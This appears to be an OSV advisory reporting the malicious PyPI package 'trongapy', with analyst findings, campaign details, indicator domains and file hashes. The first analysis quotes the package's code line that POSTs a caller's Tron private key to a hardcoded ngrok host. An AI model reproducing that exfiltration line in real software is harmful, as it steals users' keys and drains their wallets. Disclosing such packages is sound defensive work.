MAL-2026-5683

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/trongapy/MAL-2026-5683.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5683
Published
2026-06-12T07:33:10Z
Modified
2026-06-12T20:02:02.305304479Z
Summary
Malicious code in trongapy (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0fa840452c4774ec07d74bbed23fbe1c848a2d83303df3f028e73af31045b495)

The package's only public function, perm(private_key) in trongapy/main.py, unconditionally POSTs the caller-supplied Tron private key as JSON to a hardcoded ngrok tunnel: requests.post('https://reda-sequestered-justine.ngrok-free.dev/tron', json={'private_key': private_key}). The package name 'trongapy' suggests a Tron blockchain helper; any developer who invokes the advertised API with a real private key silently transmits that key to the author, who can then drain the associated wallets. No disclosure of this transmission appears in package documentation. Package metadata further undermines provenance: setup.py lists author 'mirontrx' (dueltmp+wajte@gmail.com) while the 'Source Repository' URL points to an unrelated GitHub user with a literal 'replace with your github source' placeholder comment.

Source: kam193 (aacf2f97461deed6a022e67932b5b4af6e99163664e4de6b0a16256fd68a3cd4)

Package appears to be designed for private key exfiltration, but no known usage. The name appears to be related to the cryptocurrency TRX (Tron / Tronix). Some packages additionally clone the readme of other, legit libraries. Similar packages are repeatedly uploaded to PyPI.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2025-04-tronix

Reasons (based on the campaign):

  • exfiltration-generic

  • crypto-related

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "aacf2f97461deed6a022e67932b5b4af6e99163664e4de6b0a16256fd68a3cd4",
            "modified_time": "2026-06-12T07:33:11.043504Z",
            "source": "kam193",
            "import_time": "2026-06-12T08:51:24.493955888Z",
            "id": "pypi/2025-04-tronix/trongapy"
        },
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "0fa840452c4774ec07d74bbed23fbe1c848a2d83303df3f028e73af31045b495",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:09:31Z",
            "import_time": "2026-06-12T19:44:10.864280112Z",
            "id": "IN-MAL-2026-006125"
        }
    ],
    "iocs": {
        "domains": [
            "68076f26e81df7060eba3e58.mockapi.io",
            "66c0dc0bba6f27ca9a57c4bf.mockapi.io",
            "67b9f37c51192bd378dee810.mockapi.io",
            "reda-sequestered-justine.ngrok-free.dev"
        ]
    }
}

Affected packages

PyPI / trongapy

Package

Affected ranges

Affected versions

0.*
0.0.1

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "trongapy-0.0.1-py3-none-any.whl",
            "hashes": {
                "sha256": "dc79a04bd0a61df43cc77658f7a2d5edd5925f7963397bff52791181456f62f9",
                "md5": "5c8cb50dbe5c6c79b3ea814d45eed62e",
                "blake2b_256": "94e009dd435ac4b0d56c40c8eb2a6cdebb6c69e8923ee1baf5d4f16a30e43a55"
            }
        },
        {
            "filename": "trongapy-0.0.1.tar.gz",
            "hashes": {
                "sha256": "0f145279c0ccd64adbfe93ee92561b75597f101cd1292fe838ddc51019ed1c1d",
                "md5": "d2100b1cf197532a8ad875618a56ea05",
                "blake2b_256": "f7396ed95ffd1df5ffba65c4ec0cbc42c28807c246ac311db96ca1b71afc0c92"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "3e075389e4101fc247bc5fb09a8bc0e223664568746f73792b54b27b486b2d6b",
            "path": "trongapy/main.py",
            "tlsh": "eb317a5206da280e8201b42bdc497e0d3cd768ff3e9f263836dc489a7fe613445a5192"
        },
        {
            "sha256": "2aab65b0cbefe4ddc475b1eb522a70db6e7a7a7c3f9cc002a4b32d1851ad107e",
            "path": "setup.py",
            "tlsh": "d711cca64c51211514b9825cac269c9ff636636b695088d7fd7c02443ff22c3eeb7628"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/trongapy/MAL-2026-5683.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]